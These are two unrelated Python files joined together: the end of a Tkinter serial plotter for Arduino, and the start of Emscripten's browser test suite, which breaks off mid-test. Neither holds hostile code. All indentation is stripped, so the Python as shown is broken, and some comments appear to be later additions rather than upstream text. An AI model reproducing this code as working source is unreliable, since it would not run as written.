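# Example invocation (port name is an assumption; adjust for your system):
#   python serialplotter.py --port_name /dev/ttyUSB0 --baud_rate 115200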
# Interactive matplotlib graph on (updates instantly)
plt.ion()
# Define port with name, Baud rate = 9600, Arduino default config is 8N1
portName = args.port_name
baudRate = args.baud_rate
ser = serial.Serial()
try:
ser = serial.Serial(portName, baudRate, timeout=1, parity=serial.PARITY_NONE, bytesize=8, stopbits=1)
except:
print('Could not open port ' + portName)
sys.exit(0)
# Define placeholders for plot data
graph_x = []
graph_y = []
# Function for reading a line from the serial port; use asynchronously to avoid blocking the GUI
def readSerialLine():
try:
#Read newline separated line, decode with utf-8 and strip newline
return ser.readline().decode('utf-8').rstrip()
except:
print('Unexpected error:', sys.exc_info()[0])
# Try to parse a string to a float. Returns 0.0 if the string is not a valid float.
def parseStringToFloat(str):
try:
return float(str)
except ValueError:
print('ValueError. Could not convert ' + str + ' to float.')
return 0.0
# App window that holds the graph and graph toolbar
class graphWindown(tk.Tk):
# boolean flag for background thread to close when the app is closing
appIsClosing = False
# Async looping function for listening to the serial port
def readAsyncPort(self, a_plot, canv):
while(self.appIsClosing == False): # loop while the app is open
if (ser.inWaiting() > 0): # read only if there are bytes waiting
# Read line from serial
str = readSerialLine()
# skip rest of the loop if the string is empty.
# This may happen if the serial line read is started from the middle
if(len(str) == 0):
continue
# Parse string to float
val = parseStringToFloat(str)
# Update data
graph_x.append(len(graph_x))
graph_y.append(val)
# update graph and draw
a_plot.plot(graph_x, graph_y, '-r') #-r = red
canv.draw()
# print to console for debugging
print(val)
# exited the loop
print("Background loop ended")
if ser.isOpen():
ser.close()
print("Closed the serial port")
os._exit(1) # not the preferred way of closing but this allows the background thread to shut the app
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs) # init GUI
tk.Tk.wm_title(self, "Python serial plotter for Arduino") # Title for this window
# define window container frame
container = tk.Frame(self)
container.pack(side="top", fill="both", expand = True)
# setup graph figure
f = Figure(figsize=(5,5), dpi=100)
a = f.add_subplot(111)
# get canvas for the figure
canvas = FigureCanvasTkAgg(f, self)
canvas.show()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
# setup toolbar for the graph
toolbar = NavigationToolbar2TkAgg(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# start listening to the serial port
thread = threading.Thread(target=self.readAsyncPort, args=(a, canvas))
thread.start()
# Handle for window closing
def on_closing(self):
self.appIsClosing = True # message to background thread that the app is closing
# open app window
app = graphWindown()
app.protocol("WM_DELETE_WINDOW", app.on_closing)
app.mainloop()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_fastcomp, no_wasm_backend, create_test_file, parameterized
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
if sys.version_info.major == 2:
from urllib import urlopen
else:
from urllib.request import urlopen
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
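# Illustrative sketch (not part of the original suite) of the byte-range handling in
# do_GET above: a client sending "Range: bytes=0-3" gets back only data[0:4] as the
# response body; port 11111 matches the server created above.
def _example_range_request():
    if sys.version_info.major == 2:
        from urllib2 import Request, urlopen as open_url
    else:
        from urllib.request import Request, urlopen as open_url
    req = Request('http://localhost:11111/', headers={'Range': 'bytes=0-3'})
    return open_url(req).read()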
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps. emscripten_loadSourceMap looks at $HTML.map but it should be $NAME.wasm.map.
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric, non-control-code ASCII characters are supported;
# the characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support them.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped as '@@' to avoid confusion with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
os.makedirs('assets/sub/asset1/'.replace('\\', '/'))
os.makedirs('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir('dirrey')
except OSError:
pass
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.createPreloadedFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
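# Sketch of the call above (the argument names are my reading of the FS API, not taken
# verbatim from its docs): FS.createPreloadedFile(parentDir, targetName, sourceUrl,
# canRead, canWrite), i.e. fetch 'somefile.txt' and expose it as /someotherfile.txt,
# readable but not writable. --use-preload-plugins is required for the preload step.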
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that output files with single or double quotes in their names are handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except OSError:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
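# The JS library above assumes the following shape for Module['preloadResults']
# (inferred from the code, not from documentation):
#   { '<package name>': { 'fromCache': <bool>, ... }, ... }
# so checkPreloadResults() simply counts how many packages were served from the
# IndexedDB preload cache.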
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
os.makedirs(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs('subdirr')
os.makedirs('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
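# Sketch of the locateFile hook injected above: Emscripten calls
# Module.locateFile(path, prefix) for each file it needs to fetch and uses the
# returned URL, so here .wasm files resolve next to the page while everything
# else (e.g. the .data package) is redirected to the "cdn/" directory.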
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test that an unknown protocol goes through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also provides -O2 coverage for --preload-file and memory-init.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
